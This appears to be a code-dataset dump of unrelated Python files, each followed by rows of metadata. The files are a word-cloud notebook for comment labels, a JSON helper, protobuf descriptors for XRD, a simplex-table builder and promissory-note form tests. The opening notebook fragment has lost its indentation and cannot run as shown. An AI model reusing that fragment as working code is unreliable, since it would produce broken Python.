df_clean.loc[:,text]=cleaning.strip_punct(df_clean[text])
if stop:
df_clean.loc[:,text]=nlp.strip_stopwords(df_clean[text], stopwords=stopwords)
df_pos = df_clean[df_clean[label]==1]
df_neg = df_clean[df_clean[label]==0]
topwords_pos = feature_engineering.calculate_top_words(df_pos[text], relative=True)
topwords_neg = feature_engineering.calculate_top_words(df_neg[text], relative=True)
topwords_pos_rel = topwords_pos.subtract(topwords_neg, fill_value=0).sort_values(ascending=False)
topwords_neg_rel = (-topwords_pos_rel).sort_values(ascending=False)
if plot and all_plots:
print(f'Order of plots:\nTop left: {label} = positive\nTop right: {label} = negative\nBottom left: {label} = positive, specific\nBottom right: {label} = negative, specific')
plt.figure(figsize = (12, 12))
plt.subplot(2, 2, 1)
visualizing.plot_wordcloud_freq(topwords_pos, colormap='BuGn')
plt.subplot(2, 2, 2)
visualizing.plot_wordcloud_freq(topwords_neg, colormap='RdPu')
plt.subplot(2, 2, 3)
visualizing.plot_wordcloud_freq(topwords_pos_rel,colormap='YlGn')
plt.subplot(2, 2, 4)
visualizing.plot_wordcloud_freq(topwords_neg_rel, colormap='OrRd')
plt.show()
elif plot and all_plots==False:
plt.figure(figsize=(12,6))
plt.subplot(1, 2, 2)
visualizing.plot_wordcloud_freq(topwords_neg_rel, colormap='binary')
plt.subplot(1, 2, 1)
visualizing.plot_wordcloud_freq(topwords_pos_rel,colormap='RdPu')
plt.show()
if return_list:
return topwords_pos, topwords_neg, topwords_pos_rel, topwords_neg_rel
# %% [markdown]
# # Getting the top words in comments for every label
# %% [markdown]
# ## Arguments used
# %%
arg_pos, arg_neg, arg_pos_rel, arg_neg_rel = top_words_label(df, 'label_argumentsused', 'body', True, stopwords)
# %% tags=[]
print(f'top words for argument used positive:\n{arg_pos[:10]}')
print(f'top words for argument used negative:\n{arg_neg[:10]}')
print(f'top words for argument used positive specific:\n{arg_pos_rel[:10]}')
print(f'top words for argument used negative specific:\n{arg_neg_rel[:10]}')
# %% [markdown]
# ## Discriminating
# %%
dis_pos, dis_neg, dis_pos_rel, dis_neg_rel = top_words_label(df, 'label_discriminating', 'body', True, stopwords)
# %%
print(f'top words for discriminating positive:\n{dis_pos[:10]}')
print(f'top words for discriminating negative:\n{dis_neg[:10]}')
print(f'top words for discriminating positive specific:\n{dis_pos_rel[:10]}')
print(f'top words for discriminating negative specific:\n{dis_neg_rel[:10]}')
# %% [markdown]
# ## Inappropriate
# %%
ina_pos, ina_neg, ina_pos_rel, ina_neg_rel = top_words_label(df, 'label_inappropriate', 'body', True, stopwords)
# %%
print(f'top words for innapropriate positive:\n{ina_pos[:10]}')
print(f'top words for innapropriate negative:\n{ina_neg[:10]}')
print(f'top words for innapropriate positive specific:\n{ina_pos_rel[:10]}')
print(f'top words for innapropriate negative specific:\n{ina_neg_rel[:10]}')
# %% [markdown]
# ## Off-Topic
# %%
ot_pos, ot_neg, ot_pos_rel, ot_neg_rel = top_words_label(df, 'label_offtopic', 'body', True, stopwords)
# %%
print(f'top words for Off-Topic positive:\n{ot_pos[:10]}')
print(f'top words for Off-Topic negative:\n{ot_neg[:10]}')
print(f'top words for Off-Topic positive specific:\n{ot_pos_rel[:10]}')
print(f'top words for Off-Topic negative specific:\n{ot_neg_rel[:10]}')
# %% [markdown]
# ## Personal stories
# %%
ps_pos, ps_neg, ps_pos_rel, ps_neg_rel = top_words_label(df, 'label_personalstories', 'body', True, stopwords)
# %%
print(f'top words for Personal Stories positive:\n{ps_pos[:10]}')
print(f'top words for Personal Stories negative:\n{ps_neg[:10]}')
print(f'top words for Personal Stories positive specific:\n{ps_pos_rel[:10]}')
print(f'top words for Personal Stories negative specific:\n{ps_neg_rel[:10]}')
# %% [markdown]
# ## Possibly Feedback
# %%
fb_pos, fb_neg, fb_pos_rel, fb_neg_rel = top_words_label(df, 'label_possiblyfeedback', 'body', True, stopwords)
# %%
print(f'top words for Possibly Feedback positive:\n{fb_pos[:10]}')
print(f'top words for Possibly Feedback negative:\n{fb_neg[:10]}')
print(f'top words for Possibly Feedback positive specific:\n{fb_pos_rel[:10]}')
print(f'top words for Possibly Feedback negative specific:\n{fb_neg_rel[:10]}')
# %% [markdown]
# ## Sentiment
# ### Negative
# %%
sng_pos, sng_neg, sng_pos_rel, sng_neg_rel = top_words_label(df, 'label_sentimentnegative', 'body', True, stopwords)
# %%
print(f'top words for Sentiment Negative positive:\n{sng_pos[:10]}')
print(f'top words for Sentiment Negative negative:\n{sng_neg[:10]}')
print(f'top words for Sentiment Negative positive specific:\n{sng_pos_rel[:10]}')
print(f'top words for Sentiment Negative negative specific:\n{sng_neg_rel[:10]}')
# %% [markdown]
# ### Neutral
# %%
snt_pos, snt_neg, snt_pos_rel, snt_neg_rel = top_words_label(df, 'label_sentimentneutral', 'body', True, stopwords)
# %%
print(f'top words for Sentiment Neutral positive:\n{snt_pos[:10]}')
print(f'top words for Sentiment Neutral negative:\n{snt_neg[:10]}')
print(f'top words for Sentiment Neutral positive specific:\n{snt_pos_rel[:10]}')
print(f'top words for Sentiment Neutral negative specific:\n{snt_neg_rel[:10]}')
# %% [markdown]
# ### Positive
# %%
spo_pos, spo_neg, spo_pos_rel, spo_neg_rel = top_words_label(df, 'label_sentimentpositive', 'body', True, stopwords)
# %%
print(f'top words for Sentiment Positive positive:\n{spo_pos[:10]}')
print(f'top words for Sentiment Positive negative:\n{spo_neg[:10]}')
print(f'top words for Sentiment Positive positive specific:\n{spo_pos_rel[:10]}')
print(f'top words for Sentiment Positive negative specific:\n{spo_neg_rel[:10]}')
# %% [markdown]
# # Getting the top words in headline for every label
# %% [markdown]
# ## Arguments Used
# %%
arg_pos, arg_neg, arg_pos_rel, arg_neg_rel = top_words_label(df, 'label_argumentsused', 'headline', True, stopwords)
# %% tags=[]
print(f'top words for argument used positive:\n{arg_pos[:10]}')
print(f'top words for argument used negative:\n{arg_neg[:10]}')
print(f'top words for argument used positive specific:\n{arg_pos_rel[:10]}')
print(f'top words for argument used negative specific:\n{arg_neg_rel[:10]}')
# %% [markdown]
# ## Discriminating
# %%
dis_pos, dis_neg, dis_pos_rel, dis_neg_rel = top_words_label(df, 'label_discriminating', 'headline', True, stopwords)
# %%
print(f'top words for discriminating positive:\n{dis_pos[:10]}')
print(f'top words for discriminating negative:\n{dis_neg[:10]}')
print(f'top words for discriminating positive specific:\n{dis_pos_rel[:10]}')
print(f'top words for discriminating negative specific:\n{dis_neg_rel[:10]}')
# %% [markdown]
# ## Inappropriate
# %%
ina_pos, ina_neg, ina_pos_rel, ina_neg_rel = top_words_label(df, 'label_inappropriate', 'headline', True, stopwords)
# %%
print(f'top words for innapropriate positive:\n{ina_pos[:10]}')
print(f'top words for innapropriate negative:\n{ina_neg[:10]}')
print(f'top words for innapropriate positive specific:\n{ina_pos_rel[:10]}')
print(f'top words for innapropriate negative specific:\n{ina_neg_rel[:10]}')
# %% [markdown]
# ## Off-Topic
# %%
ot_pos, ot_neg, ot_pos_rel, ot_neg_rel = top_words_label(df, 'label_offtopic', 'headline', True, stopwords)
# %%
print(f'top words for Off-Topic positive:\n{ot_pos[:10]}')
print(f'top words for Off-Topic negative:\n{ot_neg[:10]}')
print(f'top words for Off-Topic positive specific:\n{ot_pos_rel[:10]}')
print(f'top words for Off-Topic negative specific:\n{ot_neg_rel[:10]}')
# %% [markdown]
# ## Personal stories
# %%
ps_pos, ps_neg, ps_pos_rel, ps_neg_rel = top_words_label(df, 'label_personalstories', 'headline', True, stopwords)
# %%
print(f'top words for Personal Stories positive:\n{ps_pos[:10]}')
print(f'top words for Personal Stories negative:\n{ps_neg[:10]}')
print(f'top words for Personal Stories positive specific:\n{ps_pos_rel[:10]}')
print(f'top words for Personal Stories negative specific:\n{ps_neg_rel[:10]}')
# %% [markdown]
# ## Possibly Feedback
# %%
fb_pos, fb_neg, fb_pos_rel, fb_neg_rel = top_words_label(df, 'label_possiblyfeedback', 'headline', True, stopwords)
# %%
print(f'top words for Possibly Feedback positive:\n{fb_pos[:10]}')
print(f'top words for Possibly Feedback negative:\n{fb_neg[:10]}')
print(f'top words for Possibly Feedback positive specific:\n{fb_pos_rel[:10]}')
print(f'top words for Possibly Feedback negative specific:\n{fb_neg_rel[:10]}')
# %% [markdown]
# ## Sentiment
# ### Negative
# %%
sng_pos, sng_neg, sng_pos_rel, sng_neg_rel = top_words_label(df, 'label_sentimentnegative', 'headline', True, stopwords)
# %%
print(f'top words for Sentiment Negative positive:\n{sng_pos[:10]}')
print(f'top words for Sentiment Negative negative:\n{sng_neg[:10]}')
print(f'top words for Sentiment Negative positive specific:\n{sng_pos_rel[:10]}')
print(f'top words for Sentiment Negative negative specific:\n{sng_neg_rel[:10]}')
# %% [markdown]
# ### Neutral
# %%
snt_pos, snt_neg, snt_pos_rel, snt_neg_rel = top_words_label(df, 'label_sentimentneutral', 'headline', True, stopwords)
# %%
print(f'top words for Sentiment Neutral positive:\n{snt_pos[:10]}')
print(f'top words for Sentiment Neutral negative:\n{snt_neg[:10]}')
print(f'top words for Sentiment Neutral positive specific:\n{snt_pos_rel[:10]}')
print(f'top words for Sentiment Neutral negative specific:\n{snt_neg_rel[:10]}')
# %% [markdown]
# ### Positive
# %%
spo_pos, spo_neg, spo_pos_rel, spo_neg_rel = top_words_label(df, 'label_sentimentpositive', 'headline', True, stopwords)
# %%
print(f'top words for Sentiment Positive positive:\n{spo_pos[:10]}')
print(f'top words for Sentiment Positive negative:\n{spo_neg[:10]}')
print(f'top words for Sentiment Positive positive specific:\n{spo_pos_rel[:10]}')
print(f'top words for Sentiment Positive negative specific:\n{spo_neg_rel[:10]}')
# %% [markdown]
# ### Wordclouds by annotation round
# %% [markdown]
# ### negative
# %%
top_words_label(df.query('ann_round==2'), 'label_sentimentnegative', 'body', True, stopwords, True, False, False)
plt.savefig('../pictures/wc_negative_round2.png')
# %%
top_words_label(df, 'label_sentimentnegative', 'body', True, stopwords, True, False, False)
plt.savefig('../pictures/wc_negative_all.png')
# %% [markdown]
# ### positive
# %%
top_words_label(df.query('ann_round==2'), 'label_sentimentpositive', 'body', True, stopwords, True, False, False)
# %%
top_words_label(df, 'label_sentimentpositive', 'body', True, stopwords, True, False, False)
# %% [markdown]
# ### Discriminating
# %%
top_words_label(df.query('ann_round==2'), 'label_discriminating', 'body', True, stopwords, True, False, False)
# %%
top_words_label(df, 'label_discriminating', 'body', True, stopwords, True, False, False)
# %% [markdown] tags=[]
# ### inappropriate
# %%
top_words_label(df.query('ann_round==2'), 'label_inappropriate', 'body', True, stopwords, True, False, False)
# %%
top_words_label(df, 'label_inappropriate', 'body', True, stopwords, True, False, False)
# %% [markdown]
# ## Off-Topic
# %%
top_words_label(df.query('ann_round==2'), 'label_offtopic', 'body', True, stopwords, True, False, False)
# %%
top_words_label(df, 'label_offtopic', 'body', True, stopwords, True, False, False)
# %% [markdown]
# ## Arguments used
# %%
top_words_label(df.query('ann_round==2'), 'label_argumentsused', 'body', True, stopwords, True, False, False)
# %%
top_words_label(df, 'label_argumentsused', 'body', True, stopwords, True, False, False)
# %% [markdown] tags=[]
# ### Personal stories
# %%
top_words_label(df.query('ann_round==2'), 'label_personalstories', 'body', True, stopwords, True, False, False)
# %%
top_words_label(df, 'label_personalstories', 'body', True, stopwords, True, False, False)
# %% [markdown]
# ### possibly feedback
# %%
top_words_label(df.query('ann_round==2'), 'label_possiblyfeedback', 'body', True, stopwords, True, False, False)
# %%
top_words_label(df, 'label_possiblyfeedback', 'body', True, stopwords, True, False, False)
# %%
| 34.660477
| 181
| 0.716079
| 1,942
| 13,067
| 4.606591
| 0.086509
| 0.100156
| 0.089761
| 0.112676
| 0.833892
| 0.827409
| 0.813772
| 0.810195
| 0.749385
| 0.687123
| 0
| 0.016548
| 0.125966
| 13,067
| 376
| 182
| 34.75266
| 0.766745
| 0.11288
| 0
| 0.496644
| 0
| 0.006711
| 0.493632
| 0.209486
| 0
| 0
| 0
| 0
| 0
| 1
| 0.006711
| false
| 0
| 0.040268
| 0
| 0.053691
| 0.489933
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
83655339586e826b5dfd8df1c6b544b940af576c
| 88
|
py
|
Python
|
lawliet/handler/__init__.py
|
fastschnell/Lawliet
|
3a0ed9046d10307ec368259e3c7dca958a7c25cd
|
[
"MIT"
] | 2
|
2019-05-24T08:50:43.000Z
|
2019-06-28T11:47:29.000Z
|
lawliet/handler/__init__.py
|
fing520/Lawliet
|
3a0ed9046d10307ec368259e3c7dca958a7c25cd
|
[
"MIT"
] | null | null | null |
lawliet/handler/__init__.py
|
fing520/Lawliet
|
3a0ed9046d10307ec368259e3c7dca958a7c25cd
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import json
def json_loads(data):
return json.loads(data)
| 12.571429
| 27
| 0.636364
| 13
| 88
| 4.230769
| 0.692308
| 0.327273
| 0.472727
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.014085
| 0.193182
| 88
| 6
| 28
| 14.666667
| 0.760563
| 0.238636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 8
|
55e48bf5ff32eb255d40903a724fe7ec85c1f653
| 7,027
|
py
|
Python
|
xrd_pb2.py
|
dewitt/webfingerclient-dclinton
|
c13990378c8b0516c84f8507664e0a6ab8eefac5
|
[
"Apache-2.0"
] | 1
|
2020-09-03T23:55:04.000Z
|
2020-09-03T23:55:04.000Z
|
xrd_pb2.py
|
dewitt/webfingerclient-dclinton
|
c13990378c8b0516c84f8507664e0a6ab8eefac5
|
[
"Apache-2.0"
] | null | null | null |
xrd_pb2.py
|
dewitt/webfingerclient-dclinton
|
c13990378c8b0516c84f8507664e0a6ab8eefac5
|
[
"Apache-2.0"
] | null | null | null |
# Generated by the protocol buffer compiler. DO NOT EDIT!
from google.protobuf import descriptor
from google.protobuf import message
from google.protobuf import reflection
from google.protobuf import service
from google.protobuf import service_reflection
from google.protobuf import descriptor_pb2
_XRD = descriptor.Descriptor(
name='Xrd',
full_name='Xrd',
filename='xrd.proto',
containing_type=None,
fields=[
descriptor.FieldDescriptor(
name='id', full_name='Xrd.id', index=0,
number=1, type=9, cpp_type=9, label=1,
default_value=unicode("", "utf-8"),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
descriptor.FieldDescriptor(
name='expires', full_name='Xrd.expires', index=1,
number=2, type=9, cpp_type=9, label=1,
default_value=unicode("", "utf-8"),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
descriptor.FieldDescriptor(
name='subject', full_name='Xrd.subject', index=2,
number=3, type=9, cpp_type=9, label=1,
default_value=unicode("", "utf-8"),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
descriptor.FieldDescriptor(
name='aliases', full_name='Xrd.aliases', index=3,
number=4, type=9, cpp_type=9, label=3,
default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
descriptor.FieldDescriptor(
name='properties', full_name='Xrd.properties', index=4,
number=5, type=11, cpp_type=10, label=3,
default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
descriptor.FieldDescriptor(
name='links', full_name='Xrd.links', index=5,
number=6, type=11, cpp_type=10, label=3,
default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[], # TODO(robinson): Implement.
enum_types=[
],
options=None)
_PROPERTY = descriptor.Descriptor(
name='Property',
full_name='Property',
filename='xrd.proto',
containing_type=None,
fields=[
descriptor.FieldDescriptor(
name='nil', full_name='Property.nil', index=0,
number=1, type=8, cpp_type=7, label=1,
default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
descriptor.FieldDescriptor(
name='type', full_name='Property.type', index=1,
number=2, type=9, cpp_type=9, label=1,
default_value=unicode("", "utf-8"),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
descriptor.FieldDescriptor(
name='value', full_name='Property.value', index=2,
number=3, type=9, cpp_type=9, label=1,
default_value=unicode("", "utf-8"),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[], # TODO(robinson): Implement.
enum_types=[
],
options=None)
_LINK = descriptor.Descriptor(
name='Link',
full_name='Link',
filename='xrd.proto',
containing_type=None,
fields=[
descriptor.FieldDescriptor(
name='rel', full_name='Link.rel', index=0,
number=1, type=9, cpp_type=9, label=1,
default_value=unicode("", "utf-8"),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
descriptor.FieldDescriptor(
name='type', full_name='Link.type', index=1,
number=2, type=9, cpp_type=9, label=1,
default_value=unicode("", "utf-8"),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
descriptor.FieldDescriptor(
name='href', full_name='Link.href', index=2,
number=3, type=9, cpp_type=9, label=1,
default_value=unicode("", "utf-8"),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
descriptor.FieldDescriptor(
name='template', full_name='Link.template', index=3,
number=4, type=9, cpp_type=9, label=1,
default_value=unicode("", "utf-8"),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
descriptor.FieldDescriptor(
name='titles', full_name='Link.titles', index=4,
number=5, type=11, cpp_type=10, label=3,
default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
descriptor.FieldDescriptor(
name='properties', full_name='Link.properties', index=5,
number=6, type=11, cpp_type=10, label=3,
default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[], # TODO(robinson): Implement.
enum_types=[
],
options=None)
_TITLE = descriptor.Descriptor(
name='Title',
full_name='Title',
filename='xrd.proto',
containing_type=None,
fields=[
descriptor.FieldDescriptor(
name='lang', full_name='Title.lang', index=0,
number=1, type=9, cpp_type=9, label=1,
default_value=unicode("", "utf-8"),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
descriptor.FieldDescriptor(
name='value', full_name='Title.value', index=1,
number=2, type=9, cpp_type=9, label=1,
default_value=unicode("", "utf-8"),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[], # TODO(robinson): Implement.
enum_types=[
],
options=None)
_XRD.fields_by_name['properties'].message_type = _PROPERTY
_XRD.fields_by_name['links'].message_type = _LINK
_LINK.fields_by_name['titles'].message_type = _TITLE
_LINK.fields_by_name['properties'].message_type = _PROPERTY
class Xrd(message.Message):
__metaclass__ = reflection.GeneratedProtocolMessageType
DESCRIPTOR = _XRD
class Property(message.Message):
__metaclass__ = reflection.GeneratedProtocolMessageType
DESCRIPTOR = _PROPERTY
class Link(message.Message):
__metaclass__ = reflection.GeneratedProtocolMessageType
DESCRIPTOR = _LINK
class Title(message.Message):
__metaclass__ = reflection.GeneratedProtocolMessageType
DESCRIPTOR = _TITLE
| 33.146226
| 62
| 0.691333
| 889
| 7,027
| 5.241845
| 0.087739
| 0.094421
| 0.081116
| 0.069313
| 0.834979
| 0.799142
| 0.738197
| 0.720601
| 0.720601
| 0.720601
| 0
| 0.018113
| 0.175039
| 7,027
| 211
| 63
| 33.303318
| 0.785751
| 0.023339
| 0
| 0.735751
| 1
| 0
| 0.064615
| 0
| 0
| 0
| 0
| 0.004739
| 0
| 1
| 0
| false
| 0
| 0.031088
| 0
| 0.093264
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
55f33c6369e013d66ab79fefed26ae4ddddb569f
| 2,248
|
py
|
Python
|
Lab_05/create.py
|
SimonRussia/TPR
|
72f87e17ed7430378e183e8e2cb0778c5075da97
|
[
"MIT"
] | null | null | null |
Lab_05/create.py
|
SimonRussia/TPR
|
72f87e17ed7430378e183e8e2cb0778c5075da97
|
[
"MIT"
] | null | null | null |
Lab_05/create.py
|
SimonRussia/TPR
|
72f87e17ed7430378e183e8e2cb0778c5075da97
|
[
"MIT"
] | 2
|
2021-09-28T11:20:34.000Z
|
2021-12-19T20:32:45.000Z
|
# CREATE
import numpy as np
class Player_A(object):
def __init__(self, A):
self.c = None
self.b = None
self.A = A
self.marks_col = None
self.marks_row = None
self.marks_basis = None
self.matrix = None
self.start()
def fillMarks(self, A):
_A = np.array(A.transpose() )
size_c = np.shape(_A)[1]
size_b = np.shape(_A)[0]
self.c = np.ones(size_c) * -1
self.b = np.ones(size_b) * -1
temp_col = []
temp_row = []
for i in range(size_c + 1):
if i == 0:
temp_col.append( "1/g" )
else:
temp_col.append( "u{}".format(i) )
pass
for i in range(size_b):
temp_row.append( "u{}".format(i + size_c + 1) )
pass
temp_row.append( "W" )
self.marks_col = np.array(temp_col)
self.marks_row = np.array(temp_row)
self.marks_basis = np.array(temp_col[ 1 : (size_c + 1) ] )
pass
def createTable(self, c, b, A):
_A = np.array(A * -1)
temp = np.vstack( (b, _A) )
temp = temp.transpose()
_W = np.hstack( ([0], c) )
temp = np.vstack( (temp, _W) )
self.matrix = np.array(temp)
pass
def start(self):
self.fillMarks(self.A)
self.createTable(self.c, self.b, self.A)
pass
class Player_B(object):
def __init__(self, A):
self.c = None
self.b = None
self.A = A
self.marks_col = None
self.marks_row = None
self.marks_basis = None
self.matrix = None
self.start()
def fillMarks(self, A):
size_c = np.shape(A)[1]
size_b = np.shape(A)[0]
self.c = np.ones(size_c)
self.b = np.ones(size_b)
temp_col = []
temp_row = []
for i in range(size_c + 1):
if i == 0:
temp_col.append( "1/h" )
else:
temp_col.append( "v{}".format(i) )
pass
for i in range(size_b):
temp_row.append( "v{}".format(i + size_c + 1) )
pass
temp_row.append( "Z" )
self.marks_col = np.array(temp_col)
self.marks_row = np.array(temp_row)
self.marks_basis = np.array(temp_col[ 1 : (size_c + 1) ] )
pass
def createTable(self, c, b, A):
_A = np.array( A.transpose() )
temp = np.vstack( ( b, _A) )
temp = np.array( temp.transpose() )
_Z = np.hstack( ([0], c ) )
temp = np.vstack( (temp, _Z) )
self.matrix = np.array(temp)
pass
def start(self):
self.fillMarks(self.A)
self.createTable(self.c, self.b, self.A)
pass
| 17.426357
| 60
| 0.600979
| 386
| 2,248
| 3.326425
| 0.124352
| 0.074766
| 0.077103
| 0.034268
| 0.90109
| 0.90109
| 0.827103
| 0.827103
| 0.786604
| 0.739875
| 0
| 0.01216
| 0.231762
| 2,248
| 128
| 61
| 17.5625
| 0.731326
| 0.002669
| 0
| 0.704545
| 0
| 0
| 0.008929
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.090909
| false
| 0.113636
| 0.011364
| 0
| 0.125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
36458dec5bd53f5801f51cb326203cfb5c9718f9
| 19,088
|
py
|
Python
|
tests/gateways/test_web.py
|
flaviogf/promissory_note
|
6250515c1688a450e325b8fa0d22be62c8aad43f
|
[
"MIT"
] | 1
|
2019-10-08T20:12:52.000Z
|
2019-10-08T20:12:52.000Z
|
tests/gateways/test_web.py
|
flaviogf/promissory_note
|
6250515c1688a450e325b8fa0d22be62c8aad43f
|
[
"MIT"
] | 1
|
2019-05-04T23:58:24.000Z
|
2019-05-07T11:23:10.000Z
|
tests/gateways/test_web.py
|
flaviogf/promissory_note
|
6250515c1688a450e325b8fa0d22be62c8aad43f
|
[
"MIT"
] | null | null | null |
import unittest
from datetime import date
from unittest.mock import patch
from promissory_note.gateways.web import app, IssuePromissoryNoteForm
class IssuePromissoryNoteFormTests(unittest.TestCase):
def test_should_returns_true_when_validate_is_called_with_form_valid(self):
data = {
'number': 100,
'due_date': date.today().strftime('%d/%m/%Y'),
'value': 100,
'beneficiary_name': 'Steve',
'beneficiary_cpf': '00000000000',
'beneficiary_email': 'captain@marvel.com.br',
'currency': 'dollar',
'city_payment': 'New York',
'state_payment': 'New York',
'emitter_name': 'Tony Stark',
'emitter_cpf': '99999999999',
'emitter_address': 'New York',
'emitter_email': 'iron_man@marvel.com',
'issuance_date': date.today().strftime('%d/%m/%Y'),
}
issue_promissory_note_form = IssuePromissoryNoteForm(data=data)
self.assertTrue(issue_promissory_note_form.validate())
def test_should_returns_false_when_issue_note_promissory_note_does_not_contains_number(self):
data = {
'due_date': date.today().strftime('%d/%m/%Y'),
'value': 100,
'beneficiary_name': 'Steve',
'beneficiary_cpf': '00000000000',
'beneficiary_email': 'captain@marvel.com.br',
'currency': 'dollar',
'city_payment': 'New York',
'state_payment': 'New York',
'emitter_name': 'Tony Stark',
'emitter_cpf': '99999999999',
'emitter_address': 'New York',
'emitter_email': 'iron_man@marvel.com',
'issuance_date': date.today().strftime('%d/%m/%Y'),
}
issue_promissory_note_form = IssuePromissoryNoteForm(data=data)
self.assertFalse(issue_promissory_note_form.validate())
def test_should_returns_false_when_issue_note_promissory_note_does_not_contains_due_date(self):
data = {
'number': 100,
'value': 100,
'beneficiary_name': 'Steve',
'beneficiary_cpf': '00000000000',
'beneficiary_email': 'captain@marvel.com.br',
'currency': 'dollar',
'city_payment': 'New York',
'state_payment': 'New York',
'emitter_name': 'Tony Stark',
'emitter_cpf': '99999999999',
'emitter_address': 'New York',
'emitter_email': 'iron_man@marvel.com',
'issuance_date': date.today().strftime('%d/%m/%Y'),
}
issue_promissory_note_form = IssuePromissoryNoteForm(data=data)
self.assertFalse(issue_promissory_note_form.validate())
def test_should_returns_false_when_issue_note_promissory_note_does_not_contains_value(self):
data = {
'number': 100,
'due_date': date.today().strftime('%d/%m/%Y'),
'beneficiary_name': 'Steve',
'beneficiary_cpf': '00000000000',
'beneficiary_email': 'captain@marvel.com.br',
'currency': 'dollar',
'city_payment': 'New York',
'state_payment': 'New York',
'emitter_name': 'Tony Stark',
'emitter_cpf': '99999999999',
'emitter_address': 'New York',
'emitter_email': 'iron_man@marvel.com',
'issuance_date': date.today().strftime('%d/%m/%Y'),
}
issue_promissory_note_form = IssuePromissoryNoteForm(data=data)
self.assertFalse(issue_promissory_note_form.validate())
def test_should_returns_false_when_issue_note_promissory_note_does_not_contains_beneficiary_name(self):
data = {
'number': 100,
'due_date': date.today().strftime('%d/%m/%Y'),
'value': 100,
'beneficiary_cpf': '00000000000',
'beneficiary_email': 'captain@marvel.com.br',
'currency': 'dollar',
'city_payment': 'New York',
'state_payment': 'New York',
'emitter_name': 'Tony Stark',
'emitter_cpf': '99999999999',
'emitter_address': 'New York',
'emitter_email': 'iron_man@marvel.com',
'issuance_date': date.today().strftime('%d/%m/%Y'),
}
issue_promissory_note_form = IssuePromissoryNoteForm(data=data)
self.assertFalse(issue_promissory_note_form.validate())
def test_should_returns_false_when_issue_note_promissory_note_does_not_contains_beneficiary_cpf(self):
data = {
'number': 100,
'due_date': date.today().strftime('%d/%m/%Y'),
'value': 100,
'beneficiary_cpf': '00000000000',
'beneficiary_email': 'captain@marvel.com.br',
'currency': 'dollar',
'city_payment': 'New York',
'state_payment': 'New York',
'emitter_name': 'Tony Stark',
'emitter_cpf': '99999999999',
'emitter_address': 'New York',
'emitter_email': 'iron_man@marvel.com',
'issuance_date': date.today().strftime('%d/%m/%Y'),
}
issue_promissory_note_form = IssuePromissoryNoteForm(data=data)
self.assertFalse(issue_promissory_note_form.validate())
def test_should_returns_false_when_issue_note_promissory_note_does_not_contains_beneficiary_email(self):
data = {
'number': 100,
'due_date': date.today().strftime('%d/%m/%Y'),
'value': 100,
'beneficiary_name': 'Steve',
'beneficiary_cpf': '00000000000',
'currency': 'dollar',
'city_payment': 'New York',
'state_payment': 'New York',
'emitter_name': 'Tony Stark',
'emitter_cpf': '99999999999',
'emitter_address': 'New York',
'emitter_email': 'iron_man@marvel.com',
'issuance_date': date.today().strftime('%d/%m/%Y'),
}
issue_promissory_note_form = IssuePromissoryNoteForm(data=data)
self.assertFalse(issue_promissory_note_form.validate())
def test_should_returns_false_when_issue_note_promissory_note_does_not_contains_currency(self):
data = {
'number': 100,
'due_date': date.today().strftime('%d/%m/%Y'),
'value': 100,
'beneficiary_name': 'Steve',
'beneficiary_cpf': '00000000000',
'beneficiary_email': 'captain@marvel.com.br',
'city_payment': 'New York',
'state_payment': 'New York',
'emitter_name': 'Tony Stark',
'emitter_cpf': '99999999999',
'emitter_address': 'New York',
'emitter_email': 'iron_man@marvel.com',
'issuance_date': date.today().strftime('%d/%m/%Y'),
}
